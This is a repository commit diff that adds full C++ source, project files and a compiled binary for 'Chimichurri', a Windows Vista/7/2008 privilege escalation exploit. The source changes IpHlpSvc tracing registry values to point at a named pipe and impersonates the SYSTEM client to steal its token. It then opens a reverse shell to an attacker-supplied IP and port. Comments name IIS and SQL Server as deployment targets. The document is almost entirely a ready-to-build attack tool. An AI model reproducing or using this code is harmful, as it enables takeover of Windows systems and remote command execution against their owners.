parthmalhotra · Jun 22, 2015
diff --git a/‎Chimichurri.cpp
+168 b/‎Chimichurri.cpp
+168
diff --git a/‎Chimichurri.exe
95 KB b/‎Chimichurri.exe
95 KB
diff --git a/‎Chimichurri.ncb
59 KB b/‎Chimichurri.ncb
59 KB
diff --git a/‎Chimichurri.sdf
31.8 MB b/‎Chimichurri.sdf
31.8 MB
diff --git a/‎Chimichurri.sln
+21 b/‎Chimichurri.sln
+21
diff --git a/‎Chimichurri.suo
9 KB b/‎Chimichurri.suo
9 KB
diff --git a/‎Chimichurri.v12.suo
19.5 KB b/‎Chimichurri.v12.suo
19.5 KB
diff --git a/‎Chimichurri.vcproj
+154 b/‎Chimichurri.vcproj
+154
@@ -0,0 +1,168 @@
+
+// Chimichurri -> Windows 2008 R1 & R2, Windows Vista and Windows 7 exploit
+// by Cesar Cerrudo
+// Argeniss - Information Security & Software
+
+// Notes: 
+// -Must be run by a user with impersonation and asgin primary token privileges, it can be used on IIS 7 & 7.5, SQL Server or other Windows services.
+// -Chimichurri is an argentinian sauce used on asado and churrasco, the exploit name was an idea of Federico Kirschbaun, thanks Federico.
+
+#include "stdafx.h"
+
+/* We need this to compile properly; ch33kymix [at] whitedome.com.au*/
+#pragma comment(lib, "Ws2_32.lib")
+
+DWORD dwPort;
+LPSTR sIP;
+
+
+DWORD SpawnReverseShell(HANDLE hToken, DWORD dwPort,LPSTR sIP)
+{
+    HANDLE hToken2,hTokenTmp;
+	PROCESS_INFORMATION pInfo;
+	STARTUPINFO         sInfo;
+	WSADATA wd; 
+	SOCKET sock; 
+	struct sockaddr_in sin; 
+	int size = sizeof(sin); 
+
+	memset(&sin, 0, sizeof(sin)); 
+	WSAStartup(MAKEWORD( 1, 1 ), &wd); 
+	sock=WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0); 
+	sin.sin_family = AF_INET; 
+	bind(sock, (struct sockaddr*)&sin, size); 
+	sin.sin_port = htons(dwPort); 
+	sin.sin_addr.s_addr = inet_addr(sIP); 
+	
+	DWORD dwRes=connect(sock, (struct sockaddr*)&sin, size);
+
+	if (dwRes!=0){
+		printf ("/Chimichurri/-->Could not connect to %s<BR>",sIP);
+		return 0;
+	}
+	
+    ZeroMemory(&sInfo, sizeof(STARTUPINFO));
+    ZeroMemory(&pInfo, sizeof(PROCESS_INFORMATION));
+    sInfo.cb= sizeof(STARTUPINFO);
+    sInfo.lpDesktop= "WinSta0\\Default"; //so we don't have to wait on the process
+ 
+    sInfo.dwFlags = STARTF_USESTDHANDLES;
+    sInfo.hStdInput = sInfo.hStdOutput = sInfo.hStdError =(HANDLE) sock; 
+
+	hTokenTmp=hToken;
+
+	DuplicateTokenEx(hTokenTmp,MAXIMUM_ALLOWED,NULL,SecurityImpersonation, TokenPrimary,&hToken2) ;
+
+	LPTSTR lpComspec;
+	lpComspec= (LPTSTR) malloc(1024*sizeof(TCHAR));
+	GetEnvironmentVariable("comspec",lpComspec,1024);//it won't work if cmd.exe used as commandline param
+
+	dwRes=CreateProcessAsUser(hToken2,  lpComspec ,NULL, NULL, NULL, TRUE,  NULL, NULL, NULL, &sInfo, &pInfo);
+	
+	CloseHandle(hTokenTmp);
+	CloseHandle(hToken2);
+
+	return dwRes;
+
+}
+
+bool SetRegistryValues(bool on)
+{
+   HKEY hKey;
+   char a[]="\\\\localhost\\pipe\\x";
+   char b[]="%windir%\\tracing";
+   char *x=a;
+   DWORD  y=1,dwsize=strlen(a)+1;
+   bool result=false;
+
+   if(!on){
+	   x=b;
+	   y=0;
+	   dwsize=strlen(b)+1;
+   }
+
+   if( RegOpenKeyEx(HKEY_LOCAL_MACHINE,TEXT("SOFTWARE\\Microsoft\\Tracing\\IpHlpSvc"),NULL,KEY_SET_VALUE|KEY_WOW64_64KEY, &hKey) == ERROR_SUCCESS )
+   {
+		if (RegSetValueEx(hKey,"FileDirectory",NULL,REG_EXPAND_SZ,(PBYTE)x,dwsize)== ERROR_SUCCESS )
+		{
+			if (RegSetValueEx(hKey,"EnableFileTracing",NULL,REG_DWORD,(PBYTE)&y,sizeof(DWORD))== ERROR_SUCCESS )
+			{
+				result=true;
+			}
+		}
+		RegCloseKey(hKey);
+   }
+
+   return result;
+}
+
+DWORD WINAPI ThreadProc(LPVOID lpParameter){
+
+  char szPipe[]= "\\\\.\\pipe\\x\\IpHlpSvc.log";
+ 
+  HANDLE hPipe = 0,hToken=0;
+  hPipe = CreateNamedPipe (szPipe, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE|PIPE_WAIT, 2, 0, 0, 0, NULL);
+  if (!hPipe) {
+    printf ("/Chimichurri/-->Couldn't create pipe<BR>");
+	SetEvent(*((HANDLE *)lpParameter));
+    return 0;
+  }
+ 
+  ConnectNamedPipe (hPipe, NULL);
+  
+  if (!ImpersonateNamedPipeClient (hPipe)) {
+    printf ("/Chimichurri/-->Error impersonating pipe<BR>");	
+	CloseHandle(hPipe);
+	SetEvent(*((HANDLE *)lpParameter));
+	return 0;
+  }
+
+
+  if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &hToken )) {
+		printf ("/Chimichurri/-->Couldn't get token<BR>");
+		SetEvent(*((HANDLE *)lpParameter));
+		return 0;
+  }
+  CloseHandle(hPipe);
+  
+  printf ("/Chimichurri/-->Got SYSTEM token...<BR>");
+  printf ("/Chimichurri/-->Running reverse shell...<BR>");
+  
+  SpawnReverseShell(hToken,dwPort,sIP);
+  
+  SetEvent(*((HANDLE *)lpParameter));
+  return 1;
+}
+
+int _tmain(int argc, _TCHAR* argv[])
+{
+	DWORD lpThreadId;
+
+	printf ("/Chimichurri/-->This exploit gives you a Local System shell <BR>");
+
+	if (argc != 3) {
+		printf ("/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR>");
+		return 0;
+	}
+	
+	sIP= argv[1];
+	dwPort= atoi(argv[2]);
+
+	HANDLE hEvent=CreateEvent(NULL,false,false,NULL);
+	
+	CreateThread(NULL,NULL,ThreadProc,&hEvent,NULL,&lpThreadId);
+
+	printf ("/Chimichurri/-->Changing registry values...<BR>");
+	if (!SetRegistryValues(true)) {
+		printf ("/Chimichurri/-->Couldn't set registry values<BR>");
+		return 0;
+	}
+
+	WaitForSingleObject(hEvent,INFINITE);
+	
+	printf ("/Chimichurri/-->Restoring default registry values...<BR>");
+	SetRegistryValues(false);
+
+	return 0;
+}
+
@@ -0,0 +1,21 @@
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Express 2013 for Windows Desktop
+VisualStudioVersion = 12.0.31101.0
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Chimichurri", "Chimichurri.vcxproj", "{94A3EC47-DAA8-4CBD-8E65-4923F764C659}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Release|Win32 = Release|Win32
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{94A3EC47-DAA8-4CBD-8E65-4923F764C659}.Debug|Win32.ActiveCfg = Debug|Win32
+		{94A3EC47-DAA8-4CBD-8E65-4923F764C659}.Debug|Win32.Build.0 = Debug|Win32
+		{94A3EC47-DAA8-4CBD-8E65-4923F764C659}.Release|Win32.ActiveCfg = Release|Win32
+		{94A3EC47-DAA8-4CBD-8E65-4923F764C659}.Release|Win32.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
@@ -0,0 +1,154 @@
+<?xml version="1.0" encoding="Windows-1252"?>
+<VisualStudioProject
+	ProjectType="Visual C++"
+	Version="7.10"
+	Name="Chimichurri"
+	ProjectGUID="{94A3EC47-DAA8-4CBD-8E65-4923F764C659}"
+	Keyword="Win32Proj">
+	<Platforms>
+		<Platform
+			Name="Win32"/>
+	</Platforms>
+	<Configurations>
+		<Configuration
+			Name="Debug|Win32"
+			OutputDirectory="Debug"
+			IntermediateDirectory="Debug"
+			ConfigurationType="1"
+			CharacterSet="2">
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="0"
+				PreprocessorDefinitions="WIN32;_DEBUG;_CONSOLE"
+				MinimalRebuild="TRUE"
+				BasicRuntimeChecks="3"
+				RuntimeLibrary="5"
+				UsePrecompiledHeader="3"
+				WarningLevel="3"
+				Detect64BitPortabilityProblems="TRUE"
+				DebugInformationFormat="4"/>
+			<Tool
+				Name="VCCustomBuildTool"/>
+			<Tool
+				Name="VCLinkerTool"
+				AdditionalOptions="psapi.lib Ws2_32.lib rpcrt4.lib"
+				OutputFile="$(OutDir)/Chimichurri.exe"
+				LinkIncremental="2"
+				GenerateDebugInformation="TRUE"
+				ProgramDatabaseFile="$(OutDir)/Chimichurri.pdb"
+				SubSystem="1"
+				TargetMachine="1"/>
+			<Tool
+				Name="VCMIDLTool"/>
+			<Tool
+				Name="VCPostBuildEventTool"/>
+			<Tool
+				Name="VCPreBuildEventTool"/>
+			<Tool
+				Name="VCPreLinkEventTool"/>
+			<Tool
+				Name="VCResourceCompilerTool"/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"/>
+			<Tool
+				Name="VCWebDeploymentTool"/>
+			<Tool
+				Name="VCManagedWrapperGeneratorTool"/>
+			<Tool
+				Name="VCAuxiliaryManagedWrapperGeneratorTool"/>
+		</Configuration>
+		<Configuration
+			Name="Release|Win32"
+			OutputDirectory="Release"
+			IntermediateDirectory="Release"
+			ConfigurationType="1"
+			CharacterSet="2">
+			<Tool
+				Name="VCCLCompilerTool"
+				PreprocessorDefinitions="WIN32;NDEBUG;_CONSOLE"
+				RuntimeLibrary="4"
+				UsePrecompiledHeader="3"
+				WarningLevel="3"
+				Detect64BitPortabilityProblems="TRUE"
+				DebugInformationFormat="3"/>
+			<Tool
+				Name="VCCustomBuildTool"/>
+			<Tool
+				Name="VCLinkerTool"
+				OutputFile="$(OutDir)/Uroboros2.exe"
+				LinkIncremental="1"
+				GenerateDebugInformation="TRUE"
+				SubSystem="1"
+				OptimizeReferences="2"
+				EnableCOMDATFolding="2"
+				TargetMachine="1"/>
+			<Tool
+				Name="VCMIDLTool"/>
+			<Tool
+				Name="VCPostBuildEventTool"/>
+			<Tool
+				Name="VCPreBuildEventTool"/>
+			<Tool
+				Name="VCPreLinkEventTool"/>
+			<Tool
+				Name="VCResourceCompilerTool"/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"/>
+			<Tool
+				Name="VCWebDeploymentTool"/>
+			<Tool
+				Name="VCManagedWrapperGeneratorTool"/>
+			<Tool
+				Name="VCAuxiliaryManagedWrapperGeneratorTool"/>
+		</Configuration>
+	</Configurations>
+	<References>
+	</References>
+	<Files>
+		<Filter
+			Name="Source Files"
+			Filter="cpp;c;cxx;def;odl;idl;hpj;bat;asm;asmx"
+			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}">
+			<File
+				RelativePath=".\Chimichurri.cpp">
+			</File>
+			<File
+				RelativePath=".\stdafx.cpp">
+				<FileConfiguration
+					Name="Debug|Win32">
+					<Tool
+						Name="VCCLCompilerTool"
+						UsePrecompiledHeader="1"/>
+				</FileConfiguration>
+				<FileConfiguration
+					Name="Release|Win32">
+					<Tool
+						Name="VCCLCompilerTool"
+						UsePrecompiledHeader="1"/>
+				</FileConfiguration>
+			</File>
+		</Filter>
+		<Filter
+			Name="Header Files"
+			Filter="h;hpp;hxx;hm;inl;inc;xsd"
+			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}">
+			<File
+				RelativePath=".\stdafx.h">
+			</File>
+		</Filter>
+		<Filter
+			Name="Resource Files"
+			Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx"
+			UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}">
+		</Filter>
+		<File
+			RelativePath=".\ReadMe.txt">
+		</File>
+	</Files>
+	<Globals>
+	</Globals>
+</VisualStudioProject>